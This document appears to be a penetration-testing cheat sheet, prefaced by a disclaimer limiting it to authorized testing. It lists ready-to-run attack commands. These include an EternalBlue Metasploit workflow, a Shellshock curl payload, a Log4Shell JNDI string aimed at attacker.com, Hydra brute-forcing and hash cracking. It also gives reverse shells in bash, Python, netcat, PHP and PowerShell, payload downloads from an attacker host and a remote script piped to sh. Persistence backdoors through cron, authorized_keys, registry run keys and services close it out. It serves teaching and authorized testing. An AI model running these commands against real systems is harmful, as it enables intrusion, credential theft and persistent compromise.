Essential penetration testing commands for reconnaissance, exploitation, and post-exploitation. For authorized testing only.
Disclaimer
These tools and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal.
Reconnaissance
Network Discovery
# Host discovery
nmap -sn 192.168.1.0/24 # Ping scan (no port scan)
nmap -sn -PS22,80,443 192.168.1.0/24 # TCP SYN ping
nmap -sn -PU53,161 192.168.1.0/24 # UDP ping
# Quick scan
nmap -T4 -F target # Fast scan (100 common ports)
nmap --top-ports 20 target # Scan top 20 ports
# Comprehensive scan
nmap -sS -sV -O -p- -T4 target # SYN scan, version, OS, all ports
nmap -A -T4 target # Aggressive scan
nmap -sC -sV target # Default scripts + version detection
Service Enumeration
# Banner grabbing
nc -v target 80 # Manual banner grab
nmap -sV --version-intensity 5 target # Aggressive version detection
# Specific services
nmap -p 445 --script smb-enum-shares target # SMB shares
nmap -p 3306 --script mysql-info target # MySQL info
nmap -p 1433 --script ms-sql-info target # MSSQL info
nmap --script vuln target # Vulnerability scan
DNS Enumeration
# Zone transfer
dig axfr @ns1.target.com target.com
host -l target.com ns1.target.com
# Subdomain enumeration
fierce --domain target.com
amass enum -d target.com
subfinder -d target.com
# DNS brute force
dnsrecon -d target.com -t brt
dnsenum target.com
Web Reconnaissance
# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://target.com -w wordlist.txt
dirbuster (GUI)
# Subdomain enumeration
gobuster vhost -u https://target.com -w subdomains.txt
ffuf -w subdomains.txt -u https://FUZZ.target.com
# Technology detection
whatweb target.com
wappalyzer (browser extension)
Vulnerability Scanning
Automated Scanners
# Nessus (commercial)
/opt/nessus/sbin/nessus-service
# OpenVAS
gvm-setup
gvm-start
# Nikto (web scanner)
nikto -h https://target.com
# Nuclei (template-based)
nuclei -u https://target.com
nuclei -l urls.txt -t cves/
Web Application Scanning
# OWASP ZAP
zaproxy
# Burp Suite
burpsuite
# SQLMap
sqlmap -u "https://target.com/page?id=1"
sqlmap -u url --dbs # Enumerate databases
sqlmap -u url -D dbname --tables # Enumerate tables
sqlmap -u url -D dbname -T users --dump # Dump table
# XSS Testing
dalfox url https://target.com/search?q=FUZZ
Exploitation
Metasploit Framework
msfconsole # Start Metasploit
# Basic workflow
search exploit_name
use exploit/path/to/module
show options
set RHOSTS target
set LHOST attacker_ip
exploit
Common Exploits
# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
exploit
# Shellshock
curl -A "() { :; }; /bin/bash -c 'cat /etc/passwd'" https://target.com/cgi-bin/test.cgi
# Log4Shell (CVE-2021-44228)
# Payload: ${jndi:ldap://attacker.com/a}
Password Attacks
Hydra
# SSH brute force
hydra -l user -P passwords.txt ssh://target
# HTTP POST form
hydra -l admin -P passwords.txt target http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# FTP
hydra -L users.txt -P passwords.txt ftp://target
# RDP
hydra -l administrator -P passwords.txt rdp://target
John the Ripper
# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt # Show cracked passwords
# Crack with rules
john --wordlist=wordlist.txt --rules hashes.txt
# Specific hash types
john --format=NT hashes.txt # NTLM
john --format=raw-md5 hashes.txt # MD5
Hashcat
# MD5
hashcat -m 0 hashes.txt wordlist.txt
# NTLM
hashcat -m 1000 hashes.txt wordlist.txt
# WPA/WPA2
hashcat -m 2500 capture.hccapx wordlist.txt
# With rules
hashcat -m 0 hashes.txt wordlist.txt -r rules/best64.rule
Post-Exploitation
Linux Privilege Escalation
# System enumeration
uname -a # Kernel version
cat /etc/issue # OS version
cat /etc/passwd # Users
cat /etc/shadow # Password hashes (if readable)
sudo -l # Sudo permissions
# Find SUID binaries
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# World-writable files
find / -writable -type f 2>/dev/null
# Capabilities
getcap -r / 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# LinPEAS (automated)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Windows Privilege Escalation
# System info
systeminfo
whoami /priv
whoami /groups
# Find files
dir /s *pass* == *cred* == *vnc* == *.config*
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# WinPEAS (automated)
winpeas.exe
# PowerUp (PowerShell)
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
File Transfer
# HTTP server (attacker)
python3 -m http.server 8000
php -S 0.0.0.0:8000
# Download (victim Linux)
wget http://attacker:8000/file
curl http://attacker:8000/file -o file
# Download (victim Windows)
certutil -urlcache -f http://attacker:8000/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8000/file','file.exe')"
# SCP
scp file user@target:/tmp/
# Base64 transfer
base64 file | nc target 4444 # Sender
nc -l 4444 | base64 -d > file # Receiver
Shells & Backdoors
Reverse Shells
# Bash
bash -i >& /dev/tcp/attacker/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Netcat
nc -e /bin/sh attacker 4444
# PHP
php -r '$sock=fsockopen("attacker",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Listeners
# Netcat listener
nc -lvnp 4444
# Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit
Shell Upgrade
# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
export TERM=xterm
# Script
script /dev/null -c bash
Persistence
Linux
# SSH key
mkdir /root/.ssh
echo "ssh-rsa AAAA..." > /root/.ssh/authorized_keys
# Cron job
echo "* * * * * /tmp/.backdoor" > /etc/cron.d/persist
# .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc
Windows
# Scheduled task
schtasks /create /tn "Update" /tr C:\backdoor.exe /sc onlogon /ru System
# Registry run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\backdoor.exe"
# Service
sc create backdoor binpath= "C:\backdoor.exe" start= auto
sc start backdoor
Useful Tools
# SearchSploit
searchsploit apache 2.4.49
searchsploit -m exploit_id # Mirror exploit
# Exploit-DB
https://www.exploit-db.com/
# GTFOBins (Linux privilege escalation)
https://gtfobins.github.io/
# LOLBAS (Windows living-off-the-land)
https://lolbas-project.github.io/
# CrackStation (hash lookup)
https://crackstation.net/
# CyberChef (data manipulation)
https://gchq.github.io/CyberChef/
Reporting
Always document:
- Scope and methodology
- Findings with severity ratings
- Proof of concept with screenshots
- Remediation recommendations
- Executive summary